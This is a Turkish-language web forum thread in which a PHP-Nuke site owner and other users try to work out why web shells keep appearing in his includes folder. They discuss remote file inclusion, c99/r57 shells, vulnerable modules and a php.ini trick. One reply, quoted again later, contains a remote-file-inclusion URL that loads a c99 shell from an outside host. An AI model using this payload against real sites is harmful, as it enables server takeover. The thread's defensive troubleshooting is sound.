| Önceki başlık :: Sonraki başlık |
| Yazar |
Mesaj |
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
 Tarih: 2008-05-15, 22:21:47 Mesaj konusu: includes klasörüne shell basıyorlar |
 |
|
| 1 haftadır sürekli includes klasörümün içinde shell buluyorum. host firmamdanda bu konuda biraz destek aldım. includes klasörünün chmod değeri normal. açık nerede olabilir? |
|
| Başa dön |
|
 |
Bu Site Google Adsense ile Gelir Elde Ediyor
|
| Tarih: 2024-11-21, 18:12:10 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
| Başa dön |
|
|
polibo06
Site Yöneticisi
Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim
|
| Tarih: 2008-05-19, 12:31:17 Mesaj konusu: Re: includes klasörüne shell basıyorlar |
|
|
| chmod ayarlarını kontrol et.Yazma izni verme |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-05-30, 20:42:15 Mesaj konusu: |
|
|
şuan baktımda yazma izni yok zaten  |
|
| Başa dön |
|
|
berzankocak
Mesaj: 300+
Kayıt: May 26, 2007
Mesajlar: 468
|
| Tarih: 2008-05-31, 08:29:01 Mesaj konusu: |
|
|
| includes klasörüne shell basıl dığını nasıl anlıyorsununz yada bu shell tem olarak ney beni aydınlatırsanız sevinirim |
|
| Başa dön |
|
|
serserialper21
Mesaj: 1000+
Kayıt: Jan 02, 2006
Mesajlar: 1660
Konum: Diyarbakır
|
| Tarih: 2008-05-31, 09:08:20 Mesaj konusu: |
|
|
| berzankocak :
|
|
includes klasörüne shell basıl dığını nasıl anlıyorsununz yada bu shell tem olarak ney beni aydınlatırsanız sevinirim
|
2 shell yontemı vardır
1. Uzaktan shell cagırma.
Genel olarak server'de yazma izni olan dosyalara uzak'tan shell cagırabılırsınız.
örn ;
/components/com_forum/download.php?phpbb_root_path=http://uyuSsman.by.ru/c99.txt?
Diğer bir yondemde c99.php gibi php uzantılı dosya yapıp bir şekilde server'e upload edip calıstırmaktır
örn
Siteadi.com/c99.php gibi ...
C99 veya r57 shell ile server'ın tamamını bile ele geçirebilme imkanı mevcut onun ıcın tehlikeli bir script. |
|
| Başa dön |
|
|
berzankocak
Mesaj: 300+
Kayıt: May 26, 2007
Mesajlar: 468
|
| Tarih: 2008-05-31, 09:26:32 Mesaj konusu: |
|
|
| serserialper21 :
|
| berzankocak :
|
|
includes klasörüne shell basıl dığını nasıl anlıyorsununz yada bu shell tem olarak ney beni aydınlatırsanız sevinirim
|
2 shell yontemı vardır
1. Uzaktan shell cagırma.
Genel olarak server'de yazma izni olan dosyalara uzak'tan shell cagırabılırsınız.
örn ;
/components/com_forum/download.php?phpbb_root_path=http://uyuSsman.by.ru/c99.txt?
Diğer bir yondemde c99.php gibi php uzantılı dosya yapıp bir şekilde server'e upload edip calıstırmaktır
örn
Siteadi.com/c99.php gibi ...
C99 veya r57 shell ile server'ın tamamını bile ele geçirebilme imkanı mevcut onun ıcın tehlikeli bir script.
|
peki bununla ilgili nerden iyi bilgi alabilirim korunma yolları gibi ve bunun gibi tam anlami ile bilgi ala bilecegim öğrenebilecegim kendimi koruyabilecgim |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-05-31, 10:08:19 Mesaj konusu: |
|
|
| valla arkadaşlar hostçuda usanmış durumda. o bi yandan ben bi yandan shell silmekten başımızı kaldıramıyoruz :S sunucudaki diğer sitelerede saldırılıyormuş bendeki shell den. hostçu uyardı. ya bu sorunu pazartesiye kadar çözücem yada siteyi kapatıcam :S |
|
| Başa dön |
|
|
berzankocak
Mesaj: 300+
Kayıt: May 26, 2007
Mesajlar: 468
|
| Tarih: 2008-05-31, 10:27:00 Mesaj konusu: |
|
|
| peki nasil anliyorsun sitene shell basıdığını söylermisin bilgim olsun |
|
| Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
| Tarih: 2024-11-21, 18:12:10 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
| Başa dön |
|
|
serserialper21
Mesaj: 1000+
Kayıt: Jan 02, 2006
Mesajlar: 1660
Konum: Diyarbakır
|
| Tarih: 2008-05-31, 10:56:15 Mesaj konusu: |
|
|
Arkadas'ın ftp sıne upload yapmıslar herlade hostcu boyle birsey oldugunu kendısıne ıletmıstır.Silmek kalıcı cozum değildir hedefın kaynagını kapatmak lazım.
Shell'den korunmanın yolları dediğim gibi coppermine gibi eklentileri kurmassanız ve herhangi bir klasorun chmod'unu 777 yapmassanız pek birsey yapabileceklerını sanmıyorum.Ayrıca myegaley adlı resim modulunde de shell acıgı var onuda kurmamanızı tavsiye ederim |
|
| Başa dön |
|
|
berzankocak
Mesaj: 300+
Kayıt: May 26, 2007
Mesajlar: 468
|
| Tarih: 2008-05-31, 11:33:36 Mesaj konusu: |
|
|
| sağolun |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-05-31, 14:22:00 Mesaj konusu: |
|
|
| sitede hiçbir chmod değişikliği yapmadım. kurduğum tek modül gelalemin oyun modülü :S :S :S |
|
| Başa dön |
|
|
is-mail
Mesaj: 500+
Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul
|
| Tarih: 2008-06-12, 15:05:52 Mesaj konusu: |
|
|
| servere shell iki türlü atılır. birincisi hedef site üzerinden, diğeri ise aynı hostta olan bir başka site üzerinden. başka siteye müdahale şansın yok ise ki çoğu zaman olmaz :), kendi root dosyalarının temiz olduğundan emin olmalısın. nuke e çok uzun zaman ara verdim o yüzden olasıklar hangi dosyalardadır hatırlamıyorum. kodları açıp yeniden gözden geçirmem gerekiyor (tabi yayında olan bir sitenin ) ve zaman gerekiyor. şunu da eklemeden geçemicem eğer rootda c99 falan varsa başka siteye saldırdıklarında senin site adından çalıştırılacağı için shell bazı sorunlar yaşayabilirsin başkalarıyla. kaynağına gelince, ucu açık bırakılan değişkenler kodlar arasında olduğunda bu işlem yapılabiliyor. buna rfi açıkları da deniyor ve aslında kapatılması oldukçada kolaydır. dediğim gibi değişken kullanımına dkkat etmek gerekiyor. son olarak ufak bir hatırlatma yapayım, yazım izinlerine güvenmeyin çünkü adamın kod bilgisi iyi ise serverdan kolayca o izni kaldırır. |
|
| Başa dön |
|
|
komutan1905
Mesaj: 500+
Kayıt: Sep 26, 2005
Mesajlar: 534
Konum: istanbul
|
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-06-12, 21:09:56 Mesaj konusu: |
|
|
| sanırım bu linkte forumlardaki açıklardan bahsediliyor. bendeki forumlar aktif değilki. |
|
| Başa dön |
|
|
amanav
Mesaj: 500+
Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
|
| Tarih: 2008-06-12, 21:39:14 Mesaj konusu: |
|
|
shell atıyorlarsa bunun bir kaç nedeni olabilir...
1. kullandığınız modüldeki açık
2. yükleme modüllerindeki dosya tipi izni
3. sunucuda system shell shell_exec gibi tehlikeli fonksiyonlardan ileri gelen açıklar... |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-06-12, 21:41:12 Mesaj konusu: |
|
|
| dediğim gibi kullandığım tek modül gelalem oyun modülü. yükleme yapılan hiçbir modülde bulunmuyor. hostçu senin siteden basıyorlar diyor. :S:S:S |
|
| Başa dön |
|
|
amanav
Mesaj: 500+
Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
|
| Tarih: 2008-06-13, 02:54:30 Mesaj konusu: |
|
|
| yaprakbannermi böyle birşey var includes içinde o klasör içindeki .js scripti kullanılarak basıyorlar inceledim siteni... |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-06-13, 13:18:58 Mesaj konusu: |
|
|
yaprak reklamda açıkmı varmış  |
|
| Başa dön |
|
|
is-mail
Mesaj: 500+
Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul
|
| Tarih: 2008-06-13, 13:56:33 Mesaj konusu: |
|
|
| cok merak ettim. izin varsa siteye bi göz atmak isterim.. |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-06-13, 14:04:35 Mesaj konusu: |
|
|
| msn imi eklersen ftp bilgilerini verebilirim |
|
| Başa dön |
|
|
is-mail
Mesaj: 500+
Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul
|
| Tarih: 2008-06-13, 14:08:05 Mesaj konusu: |
|
|
| yok hayır onlara gerek yok. benim bişey bilmem gerekmiyor, bakalım dışardan hangi kodları nereden yiyor.. |
|
| Başa dön |
|
|
is-mail
Mesaj: 500+
Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul
|
| Tarih: 2008-06-13, 14:14:19 Mesaj konusu: |
|
|
| özelden yollarım mesajlarına bak mutlaka. |
|
| Başa dön |
|
|
amanav
Mesaj: 500+
Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
|
| Tarih: 2008-06-13, 14:33:41 Mesaj konusu: |
|
|
| asilimy :
|
|
yaprak reklamda açıkmı varmış
|
onu kullanarak php.ini adından bir dosya yaratmış işin ilginci ini uzantısını siten .php dosyası tarzında okuyor ve adam eylemlerini gerçekleştiriyor bu açık dolaylı yoldan hostinginde mevcut işin özeti hostingin .ini dosyalarına ya erişimi user olarak engelliyecek yada .txt dosyası şeklinde okuma biçimi verecek... |
|
| Başa dön |
|
|
asilimy
Mesaj: 1000+
Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul
|
| Tarih: 2008-06-13, 15:08:05 Mesaj konusu: |
|
|
hostçuyu arayıp durumu açıkladım ancak ini dosyalarını txt formatında çalışrırırlarsa joomla sistemlerinde büyük sorunlar çıkıyormuş. ayrıca hazır elime geçirmişken ioncube hakkında birşeyler sordum. sunuculara ciddi zararlar verdiği ancak yeniden denemeye alacaklarını söylediler. ini dosyaları için htaccess ten bunu ayarlayabilirsiniz dediler. ama ioncube hakkında söylediklerine inanmadım çünkü adamlar ioncube sisteminin şifreleme hakkında olduğunu bile benden öğrendi  neyse zaten bu saatten sonra gerek kalmadı hiçbişeye çünkü gelalem oyun modülü şuandan itibaren gitti giriş yapınca sanalkahve'ye link verilmiş. buradan girilmesi gerektiği yazıyor... |
|
| Başa dön |
|
|
amanav
Mesaj: 500+
Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
|
| Tarih: 2008-06-13, 15:16:17 Mesaj konusu: |
|
|
| ilginç ve bunu yapan hostcun insanların güvendiği bir yer ve o yer php hakkında dosyalar hakkında bilgi sahibi değil... |
|
| Başa dön |
|
|
|
Arama
Rütbeliler
Profil
Giriş
